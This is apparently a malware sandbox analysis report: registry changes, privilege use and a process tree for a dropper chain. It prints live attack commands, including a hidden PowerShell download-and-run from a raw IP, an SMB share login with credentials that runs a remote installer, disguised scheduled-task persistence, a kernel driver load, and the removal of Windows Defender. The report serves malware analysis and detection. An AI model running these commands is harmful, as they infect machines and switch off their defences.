Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000_Classes\Local Settings	rapes.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1840	schtasks.exe
3504	schtasks.exe
2764	schtasks.exe

Suspicious behavior: EnumeratesProcesses 49 IoCs

pid	Process
5172	powershell.exe
5172	powershell.exe
3680	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE
3680	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE
1112	rapes.exe
1112	rapes.exe
4056	rapes.exe
4056	rapes.exe
3624	9sWdA2p.exe
3624	9sWdA2p.exe
3624	9sWdA2p.exe
3624	9sWdA2p.exe
3624	9sWdA2p.exe
3624	9sWdA2p.exe
4716	but2.exe
4716	but2.exe
5196	Jordan.com
5196	Jordan.com
5196	Jordan.com
5196	Jordan.com
5196	Jordan.com
5196	Jordan.com
5008	qhjMWht.exe
5008	qhjMWht.exe
5008	qhjMWht.exe
5008	qhjMWht.exe
5008	qhjMWht.exe
5008	qhjMWht.exe
5196	Jordan.com
5196	Jordan.com
5196	Jordan.com
5196	Jordan.com
5540	rapes.exe
5540	rapes.exe
4820	powershell.exe
4820	powershell.exe
5780	powershell.exe
5780	powershell.exe
5552	powershell.exe
5552	powershell.exe
1524	5829606600.exe
1524	5829606600.exe
1524	5829606600.exe
1524	5829606600.exe
1524	5829606600.exe
1524	5829606600.exe
5128	powershell.exe
5128	powershell.exe
5128	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
668	Process not Found
668	Process not Found

Suspicious use of AdjustPrivilegeToken 54 IoCs

description	pid	Process
Token: SeDebugPrivilege	5172	powershell.exe
Token: SeDebugPrivilege	4356	tasklist.exe
Token: SeDebugPrivilege	1376	tasklist.exe
Token: SeDebugPrivilege	1132	syPMGLnV5U.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeDebugPrivilege	736	7q8Wm5h.exe
Token: SeDebugPrivilege	5780	powershell.exe
Token: SeIncreaseQuotaPrivilege	5780	powershell.exe
Token: SeSecurityPrivilege	5780	powershell.exe
Token: SeTakeOwnershipPrivilege	5780	powershell.exe
Token: SeLoadDriverPrivilege	5780	powershell.exe
Token: SeSystemProfilePrivilege	5780	powershell.exe
Token: SeSystemtimePrivilege	5780	powershell.exe
Token: SeProfSingleProcessPrivilege	5780	powershell.exe
Token: SeIncBasePriorityPrivilege	5780	powershell.exe
Token: SeCreatePagefilePrivilege	5780	powershell.exe
Token: SeBackupPrivilege	5780	powershell.exe
Token: SeRestorePrivilege	5780	powershell.exe
Token: SeShutdownPrivilege	5780	powershell.exe
Token: SeDebugPrivilege	5780	powershell.exe
Token: SeSystemEnvironmentPrivilege	5780	powershell.exe
Token: SeRemoteShutdownPrivilege	5780	powershell.exe
Token: SeUndockPrivilege	5780	powershell.exe
Token: SeManageVolumePrivilege	5780	powershell.exe
Token: 33	5780	powershell.exe
Token: 34	5780	powershell.exe
Token: 35	5780	powershell.exe
Token: 36	5780	powershell.exe
Token: SeIncreaseQuotaPrivilege	5780	powershell.exe
Token: SeSecurityPrivilege	5780	powershell.exe
Token: SeTakeOwnershipPrivilege	5780	powershell.exe
Token: SeLoadDriverPrivilege	5780	powershell.exe
Token: SeSystemProfilePrivilege	5780	powershell.exe
Token: SeSystemtimePrivilege	5780	powershell.exe
Token: SeProfSingleProcessPrivilege	5780	powershell.exe
Token: SeIncBasePriorityPrivilege	5780	powershell.exe
Token: SeCreatePagefilePrivilege	5780	powershell.exe
Token: SeBackupPrivilege	5780	powershell.exe
Token: SeRestorePrivilege	5780	powershell.exe
Token: SeShutdownPrivilege	5780	powershell.exe
Token: SeDebugPrivilege	5780	powershell.exe
Token: SeSystemEnvironmentPrivilege	5780	powershell.exe
Token: SeRemoteShutdownPrivilege	5780	powershell.exe
Token: SeUndockPrivilege	5780	powershell.exe
Token: SeManageVolumePrivilege	5780	powershell.exe
Token: 33	5780	powershell.exe
Token: 34	5780	powershell.exe
Token: 35	5780	powershell.exe
Token: 36	5780	powershell.exe
Token: SeTakeOwnershipPrivilege	1684	takeown.exe
Token: SeDebugPrivilege	5552	powershell.exe
Token: SeDebugPrivilege	2752	7q8Wm5h.exe
Token: SeDebugPrivilege	1996	aspnet_compiler.exe
Token: SeDebugPrivilege	5128	powershell.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
2740	random.exe
2740	random.exe
2740	random.exe
3680	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE
5196	Jordan.com
5196	Jordan.com
5196	Jordan.com

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
2740	random.exe
2740	random.exe
2740	random.exe
5196	Jordan.com
5196	Jordan.com
5196	Jordan.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2740 wrote to memory of 2296	2740	random.exe	82
PID 2740 wrote to memory of 2296	2740	random.exe	82
PID 2740 wrote to memory of 2296	2740	random.exe	82
PID 2740 wrote to memory of 3744	2740	random.exe	83
PID 2740 wrote to memory of 3744	2740	random.exe	83
PID 2740 wrote to memory of 3744	2740	random.exe	83
PID 2296 wrote to memory of 3504	2296	cmd.exe	85
PID 2296 wrote to memory of 3504	2296	cmd.exe	85
PID 2296 wrote to memory of 3504	2296	cmd.exe	85
PID 3744 wrote to memory of 5172	3744	mshta.exe	86
PID 3744 wrote to memory of 5172	3744	mshta.exe	86
PID 3744 wrote to memory of 5172	3744	mshta.exe	86
PID 5172 wrote to memory of 3680	5172	powershell.exe	92
PID 5172 wrote to memory of 3680	5172	powershell.exe	92
PID 5172 wrote to memory of 3680	5172	powershell.exe	92
PID 3680 wrote to memory of 1112	3680	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE	93
PID 3680 wrote to memory of 1112	3680	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE	93
PID 3680 wrote to memory of 1112	3680	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE	93
PID 1112 wrote to memory of 3624	1112	rapes.exe	97
PID 1112 wrote to memory of 3624	1112	rapes.exe	97
PID 1112 wrote to memory of 3624	1112	rapes.exe	97
PID 1112 wrote to memory of 4716	1112	rapes.exe	99
PID 1112 wrote to memory of 4716	1112	rapes.exe	99
PID 1112 wrote to memory of 4716	1112	rapes.exe	99
PID 4716 wrote to memory of 2764	4716	but2.exe	100
PID 4716 wrote to memory of 2764	4716	but2.exe	100
PID 4716 wrote to memory of 2764	4716	but2.exe	100
PID 4716 wrote to memory of 1840	4716	but2.exe	102
PID 4716 wrote to memory of 1840	4716	but2.exe	102
PID 4716 wrote to memory of 1840	4716	but2.exe	102
PID 4716 wrote to memory of 3688	4716	but2.exe	104
PID 4716 wrote to memory of 3688	4716	but2.exe	104
PID 4716 wrote to memory of 3688	4716	but2.exe	104
PID 4716 wrote to memory of 4168	4716	but2.exe	105
PID 4716 wrote to memory of 4168	4716	but2.exe	105
PID 4716 wrote to memory of 4168	4716	but2.exe	105
PID 4168 wrote to memory of 2336	4168	cmd.exe	107
PID 4168 wrote to memory of 2336	4168	cmd.exe	107
PID 4168 wrote to memory of 2336	4168	cmd.exe	107
PID 1112 wrote to memory of 3612	1112	rapes.exe	109
PID 1112 wrote to memory of 3612	1112	rapes.exe	109
PID 1112 wrote to memory of 3612	1112	rapes.exe	109
PID 3612 wrote to memory of 5380	3612	larBxd7.exe	110
PID 3612 wrote to memory of 5380	3612	larBxd7.exe	110
PID 3612 wrote to memory of 5380	3612	larBxd7.exe	110
PID 5380 wrote to memory of 4356	5380	cmd.exe	112
PID 5380 wrote to memory of 4356	5380	cmd.exe	112
PID 5380 wrote to memory of 4356	5380	cmd.exe	112
PID 5380 wrote to memory of 4560	5380	cmd.exe	113
PID 5380 wrote to memory of 4560	5380	cmd.exe	113
PID 5380 wrote to memory of 4560	5380	cmd.exe	113
PID 5380 wrote to memory of 1376	5380	cmd.exe	114
PID 5380 wrote to memory of 1376	5380	cmd.exe	114
PID 5380 wrote to memory of 1376	5380	cmd.exe	114
PID 5380 wrote to memory of 3212	5380	cmd.exe	115
PID 5380 wrote to memory of 3212	5380	cmd.exe	115
PID 5380 wrote to memory of 3212	5380	cmd.exe	115
PID 5380 wrote to memory of 768	5380	cmd.exe	116
PID 5380 wrote to memory of 768	5380	cmd.exe	116
PID 5380 wrote to memory of 768	5380	cmd.exe	116
PID 5380 wrote to memory of 3148	5380	cmd.exe	117
PID 5380 wrote to memory of 3148	5380	cmd.exe	117
PID 5380 wrote to memory of 3148	5380	cmd.exe	117
PID 5380 wrote to memory of 1352	5380	cmd.exe	118

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn 492fvmaI8Ae /tr "mshta C:\Users\Admin\AppData\Local\Temp\QaQq5GFw6.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2296
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn 492fvmaI8Ae /tr "mshta C:\Users\Admin\AppData\Local\Temp\QaQq5GFw6.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3504
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\QaQq5GFw6.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3744
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5172
  - - C:\Users\Admin\AppData\Local\TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE
      "C:\Users\Admin\AppData\Local\TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3680
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1112
      - C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3624
      - C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4716
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2764
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1840
        
        C:\Drivers\pcidrv.exe
        
        C:\Drivers\pcidrv.exe
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3688
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4168
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2336
      - C:\Users\Admin\AppData\Local\Temp\10434400101\larBxd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10434400101\larBxd7.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3612
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5380
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4356
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4560
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1376
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3212
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 689912
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:768
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Exclusion.psd
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3148
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "users" Findarticles
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1352
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1760
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5100
        
        C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
        
        Jordan.com b
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5196
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5640
      - C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5008
      - C:\Users\Admin\AppData\Local\Temp\10447480101\Mbxp0H9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10447480101\Mbxp0H9.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:704
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2652
        
        C:\Users\Admin\AppData\Roaming\syPMGLnV5U.exe
        
        "C:\Users\Admin\AppData\Roaming\syPMGLnV5U.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1132
        
        C:\Users\Admin\AppData\Roaming\syPMGLnV5U.exe
        
        "C:\Users\Admin\AppData\Roaming\syPMGLnV5U.exe" h
        9⤵
        Executes dropped EXE
        
        PID:4716
        
        C:\Users\Admin\AppData\Roaming\I9nmNxWMsz.exe
        
        "C:\Users\Admin\AppData\Roaming\I9nmNxWMsz.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5760
      - C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:736
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4820
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1016
        
        C:\Windows\SysWOW64\net.exe
        
        net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:220
        
        \??\UNC\aaso12.duckdns.org\shear\s.exe
        
        \\aaso12.duckdns.org\shear\s -fullinstall
        9⤵
        Sets service image path in registry
        
        PID:5144
      - C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4488
        
        C:\Users\Admin\AppData\Local\Temp\262.exe
        
        "C:\Users\Admin\AppData\Local\Temp\262.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2292
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B6E7.tmp\B6E8.tmp\B6E9.bat C:\Users\Admin\AppData\Local\Temp\262.exe"
        8⤵
        
        PID:1520
        
        C:\Users\Admin\AppData\Local\Temp\262.exe
        
        "C:\Users\Admin\AppData\Local\Temp\262.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3436
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B85E.tmp\B85F.tmp\B860.bat C:\Users\Admin\AppData\Local\Temp\262.exe go"
        10⤵
        Drops file in Program Files directory
        
        PID:5196
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:4692
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:3212
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:5696
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:5156
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:5872
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3620
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:4360
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
